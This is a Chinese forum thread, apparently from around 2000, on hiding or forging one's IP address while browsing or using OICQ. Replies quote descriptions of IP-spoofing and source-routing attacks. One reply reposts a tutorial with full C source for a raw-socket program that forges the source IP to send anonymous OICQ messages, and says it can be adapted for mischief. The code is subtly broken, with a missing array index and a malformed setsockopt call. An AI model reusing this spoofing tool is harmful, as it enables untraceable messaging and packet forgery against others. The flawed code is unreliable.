请问能不能在浏览网页或使用oicq时伪装自己的IP地址?(不用proxy)(200分)

  • 主题发起人 主题发起人 底火
  • 开始时间 开始时间

底火

Unregistered / Unconfirmed
GUEST, unregistred user!
当在浏览网页时,一般对方网页可显示你的IP地址,能不能让它显示错误的IP地址呢?
 
use firewall or proxy
 
我的意思就是不通过其余的服务器,我自己想设什么IP就设什么IP。
 
好象有这中伪装自己 ip的软件
 
有这种软件,它的实质实际也是一种代理。不知你说的不用proxy是什么意思?
 
不用proxy即是指不需要自己去找一个实际存在的代理服务器,请各位告诉我
哪里有伪装IP控件,或如何实现,我先谢谢了!
 
哪位大虾知道隐藏IP的原理吗?
最好能贴出源程序,谢了!!
 
如果对方不知道你的IP,那怎么能将数据包发给你呢?
 
我主要的目的就是想在浏览网页时让对方认为是不同的IP地址,我收不收到无所谓,望各
位大侠多邦忙!
 
我不太懂,但我想如果能实现,那么Hack还
怕能追踪到吗?世界将大乱。
 
能呀。 在局域网内部就能。在一个NT网中,如果每台机子有自己固定的那么就可以
在登录后修改本机的IP,前提是这个IP同时没有人在使用。比如在我们机房
一台机子可以用另一台机子的IP上网(如果那台机没有登录的话),
如果留有多余的IP就更好办了。:)
 
网络上是有说是这样的软件,但实际上并不行!记得今天在NSFOCUS的安全文摘上看到一篇
以前的文摘,题为<<网络中的攻击与防卫技术>>,我把其中的一段话COPY出来吧:
★“无中生有”信息攻击法
攻击者通过发送伪造的路由信息,无中生有地编制信源主机和目标主机的虚假路径,从
而使流向目标主机的数据包均经过攻击者的主机,给攻击者提供敏感的信息和有用的密码。
如果你的网络发生了这样的情况,建议从“内部”查找原因。因为知道屏蔽IP地址和该系
统路由器情况的人员应该列入重点怀疑对象。
还有一段:
★“暗渡陈仓”———利用信息协议的弱点攻击法

在一些网络协议中,IP源路径选项允许IP数据报告自己选择一条通往目的主机的路径(这
是一个非常不好,但是又无可奈何的技术手段,多路径正是网络连接的精髓部分!)。
攻击者试图与防火墙后面的一个不可到达的主机A连接,只需在送出的请求报文中设置IP
源路径选项,使报文有一个目的地址指向防火墙,而最终地址是主机A。当报文到达防火
墙时被允许通过,因为它指向防火墙而不是主机A。防火墙的IP层处理该报文的源路径域
并被发送到内部网上,报文就这样到达了不可到达的主机A。
对于这种攻击,笔者还没有找到有效的主动防卫方法。一个被动的检查方法是,经常查看
主机A的访问记录,发现伪装的IP地址或者不明来源的指令,以及特殊时段的访问记录,
你的网络就可能已经中招了!最好更换一个防火墙,同时加强IP地址的管理工作。

所以应该是可以的:)但据我所知,好像目前除了用代理服务和防火墙等,尚无其它软件真
的做到了隐藏自己的IP:(

 
根据iamfly2000所说,那能不能自己设置IP,然后在经过路由中加上自己的实际IP,
这样,既可以隐藏IP,又可以接收信息.望各位朋友讨论一下。
 
底火:没有这个可能性。
其实这个问题就是能不能自己操作ip层,但这个
一般无法实现。除非你自己做个ip层协议软件,或自己
控制网卡,但这样上层的应用也要自己订做,而不能用原来已有的应用(如oicq)。


其实想想真正的黑客们则么做的,他们也是利用了多次中转(例如
远程控制别的主机,或利用代理)来应藏自己,而不是凭空改变自己的ip。

这个问题没多大价值,建议斑竹结束。
 
一定不可以的,这里是一个a=>b;b=>a 的问题
如果你能屏蔽ip,则对方不知你的ip,=>tcp/ip协议不行=>你无法进行网络操作=>不能联系对方
=>无法进行通讯======>你还上网干吗?单机干着吧!0。0。0。0-255。255。255。255
不上网,这么多ip让你换那!
不要企图通过这些来当黑客了!
 
怎么会不行。前几天我找到了我自己关于路由过滤IP的答案了。ROUTER它不会管这个来源IP
是不是自己所管的,它只问你目的IP。先让我找找我的资料,里面有说到一些隐藏自己IP的
技术(我记得是)。Mmm,找到一个,来自NSFOCUS:
1)IP地址欺骗:
突破防火墙系统最常用的方法是因特网地址欺骗,它同时也是其他一系列攻击方法的基
础。黑客或入侵者利用伪造的IP发送地址产生虚假的数据分组,乔装成来自内部站的分组过
滤器,则这种类型的攻击是非常危险的。关于涉及到的分组真正是内部的还是外部的分组被
包装得看起来象内部的种种迹象都已丧失殆尽。只要系统发现发送地址在其自己的范围之内
,则它就把该分组按内部通信对待并让其通过。
当然,如果底火想也能同时和对方通信是不可能的了:),还有,想在经过路由中加上自
己的实际IP也是不能做到的。退一步来说,你能做到这一点,别人也就能得到你的真实IP,
至于怎么改自己发出去的信息包的IP,在WINDOWS下必须要让程序能运行在ring 0级才行:)
LINUX下要容易很多:)


 
用Socket变成,可以程序自己填充TCP/IP的包头
 
to 沈前卫:
能不能具体方法或事例呢?
 
Win2000中用户自定义IP头的实现及OicqSend完整实例源程序

我们知道,TCP/IP网络数据全部是通过封装在IP数据包中在Internet网上传送的,也就是
封装建立起一个包含IP头和数据的IP数据报。一般来说,网络软件总是以多个32位字产生IP
头,即使必须用附加的0填充IP头。IP头包含了传输IP数据包中封装数据的所有必要信息。
IP头的数据结构和描述如下:

成员 长度(Bit) 描述
Version 4 IP头的版本号,目前是IPv4,最新是IPv6
Header Length 4 IP头的长度,若没有特殊选择,IP头总是20字节长
Type of Service 8 服务类型,定义了数据传输的优先级、延迟、吞吐量和可靠性等特性
Total Packet Length 16 IP包的长度,若没有特殊选项,一般为20字节长
Identification 16 IP包标识,主机使用它唯一确定每个发送的数据报
Flag 3 IP数据分割标志
Fragment Offset 13 IP数据分割偏移
Time to Live 8 数据报在网络上的存活时间,每通过一个路由器,该数值减一
Protocol 8 TCP/IP协议类型,比如:ICMP为1,IGMP为2,TCP为6,UDP为17等
Header Checksum 16 头部检验和
Source IP Address 32 源IP地址
Destination IP Address 32 目的IP地址
Other ? 其他选项
Data ? 数据

实现自己定义的IP头是一件非常有意义的事情,比如,通过改变IP头里的TOS的优先级和TTL,
你可以使自己的数据包有更强的传输能力和寿命,通过修改IP头里的源IP地址就可以隐藏自己机器
的IP地址等等。象著名攻击程序“泪滴TearDrop”就是通过故意制造系统不能处理的分片IP包而实
现的,还有SYN Flooder和UDP Flooder就是通过产生随机源IP实现欺骗的。

三、实现原理

一般来说,自定义IP头是通过使用socket的库函数setsockopt()的选项IP_HDRINCL来实现的,尽管这在unix和linux平台上很容易实现,但遗憾的是在Windows平台的Winsock1.1和Winsock2.0函数库里setsockopt()不支持IP_HDRINCL选项,所以在Windows 9x/NT里是无法通过Winsock函数库来实现IP头自定义的,当然可以通过编写虚拟设备驱动程序来实现,不过比较复杂,但Windows 2000的出现打破了这种局面,Windows2000的Winsock2.2函数库里全面支持setsockopt()的选项IP_HDRINCL,使得我们轻松就可以实现自定义的IP头。实现方法如下:

SOCKET s;

BOOL bopt;

s=WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);

ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)bopt, sizeof(bopt);

四、实例

为帮助大家尽快地学会构造自己的IP头数据,特给出一个完整的实例,例子的功能是:
只要给出对方的IP地址,就可以发送给对方的OICQ一个“hello!”消息,并且由于修改了
发送数据包的IP头,完全实现了发送方IP地址的隐藏,也就是说稍加修改你就可以制作出
一个能够完完全全的匿名OICQ发送器,当然,若是故意捣乱的话,后果自负。源代码如下:

/***********************************************************************/

/* OicqSend.c */

/* 本程序用Visual C++ 6.0编译在Windows 2000 Advanced Server 上调试通过 */

/* 声明:本程序经修改后可能会产生攻击性 擅自修改成攻击程序者后果自负 */

/***********************************************************************/

#pragma pack(1)

#define WIN32_LEAN_AND_MEAN

#include <winsock2.h>
#include <ws2tcpip.h>

#include <stdio.h>
#include <stdlib.h>
#include <time.h>


#define OICQ_MAX_PACKET 1024
#define OICQ_MAX_MSG 512
#define OICQ_MSG_LEN 45
#define SRC_IP "127.0.0.1"
#define SRC_PORT 5277
#define DST_PORT 4000

typedef struct ip_hdr
{
unsigned char ip_verlen;
unsigned char ip_tos;
unsigned short ip_totallength;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_ttl;
unsigned char ip_protocol;
unsigned short ip_checksum;
unsigned int ip_srcaddr;
unsigned int ip_destaddr;
} IP_HDR;

typedef struct udp_hdr
{
unsigned short src_portno;
unsigned short dst_portno;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HDR;

char strMessage[OICQ_MSG_LEN] = {
0x02,0x01,0x07,0x00,0x78,0x00,0x00,0x31,0x30,0x30,0x30,0x31,0x1f,0x30,0x1f,
0x30,0x30,0x1f,0x32,0x30,0x30,0x30,0x2d,0x30,0x31,0x2d,0x30,0x31,0x1f,0x30,
0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x1f,0x68,0x65,0x6c,0x6c,0x6f,0x21,0x03
};

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while (size > 1)
{
cksum += *buffer++;
size -= sizeof(USHORT);
}
if (size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (USHORT)(~cksum);
}

int main(int argc, char **argv)
{
WSADATA wsd;
SOCKET s;
BOOL bOpt;
struct sockaddr_in remote;
IP_HDR ipHdr;
UDP_HDR udpHdr;
int ret;
DWORD i;
unsigned short iTotalSize,
iUdpSize,
iUdpChecksumSize,
iIPVersion,
iIPSize,
cksum = 0;
char buf[OICQ_MAX_PACKET],
*ptr = NULL;

printf("Spoof OICQ Msg Sender/n/n");

if(argc!=2) {
printf("usage: OICQSEND Destination_IP_Address");
ExitProcess(1);
}

srand((unsigned)time(NULL));
strMessage[5]=rand();

if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
printf("WSAStartup() failed: %d/n", GetLastError());
return -1;
}
s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0,0);
if (s == INVALID_SOCKET)
{
printf("WSASocket() failed: %d/n", WSAGetLastError());
return -1;
}
bOpt = TRUE;
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
if (ret == SOCKET_ERROR)
{
printf("setsockopt(IP_HDRINCL) failed: %d/n", WSAGetLastError());
return -1;
}

iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + OICQ_MSG_LEN;

iIPVersion = 4;
iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
ipHdr.ip_tos = 0;
ipHdr.ip_totallength = htons(iTotalSize);
ipHdr.ip_id = 0;
ipHdr.ip_offset = 0;
ipHdr.ip_ttl = 128;
ipHdr.ip_protocol = 0x11;
ipHdr.ip_checksum = 0 ;
ipHdr.ip_srcaddr = inet_addr(SRC_IP);
ipHdr.ip_destaddr = inet_addr(argv[1]);

iUdpSize = sizeof(udpHdr) + OICQ_MSG_LEN;

udpHdr.src_portno = htons(SRC_PORT) ;
udpHdr.dst_portno = htons(DST_PORT) ;
udpHdr.udp_length = htons(iUdpSize) ;
udpHdr.udp_checksum = 0 ;

iUdpChecksumSize = 0;
ptr = buf;
ZeroMemory(buf, OICQ_MAX_PACKET);

memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr));
ptr += sizeof(ipHdr.ip_srcaddr);
iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));
ptr += sizeof(ipHdr.ip_destaddr);
iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

ptr++;
iUdpChecksumSize += 1;

memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));
ptr += sizeof(ipHdr.ip_protocol);
iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));
ptr += sizeof(udpHdr.udp_length);
iUdpChecksumSize += sizeof(udpHdr.udp_length);

memcpy(ptr, &udpHdr, sizeof(udpHdr));
ptr += sizeof(udpHdr);
iUdpChecksumSize += sizeof(udpHdr);

for(i = 0; i <OICQ_MSG_LEN; i++, ptr++)
*ptr = strMessage;
iUdpChecksumSize += OICQ_MSG_LEN;

cksum = checksum((USHORT *)buf, iUdpChecksumSize);
udpHdr.udp_checksum = cksum;

ZeroMemory(buf, OICQ_MAX_PACKET);
ptr = buf;

memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);
memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);
memcpy(ptr, strMessage, OICQ_MSG_LEN);

remote.sin_family = AF_INET;
remote.sin_port = htons(DST_PORT);
remote.sin_addr.s_addr = inet_addr(argv[1]);

ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote));
if (ret == SOCKET_ERROR)
printf("sendto() failed: %d/n", WSAGetLastError());
else
printf("Send O.K.!");
closesocket(s) ;
WSACleanup() ;

return 0;
}
 
如果藉此要當黑客,好像還不夠!
有沒有人有 router 的數據資料!這樣比較客觀!

想法:
ISP 本身會做一些防險的動作,如與客戶接觸之第一級 Router 會在封包上再加一層封包,
記錄來源資料,直至出了 ISP 的網域才卸下!或是判斷來源 IP 不對時,直接修改來源 IP ,
使其符合出產地。

至於 Router 有無此能力,我想是有吧!

結論:
此想法受制於人,還是另想它法吧!
 
后退
顶部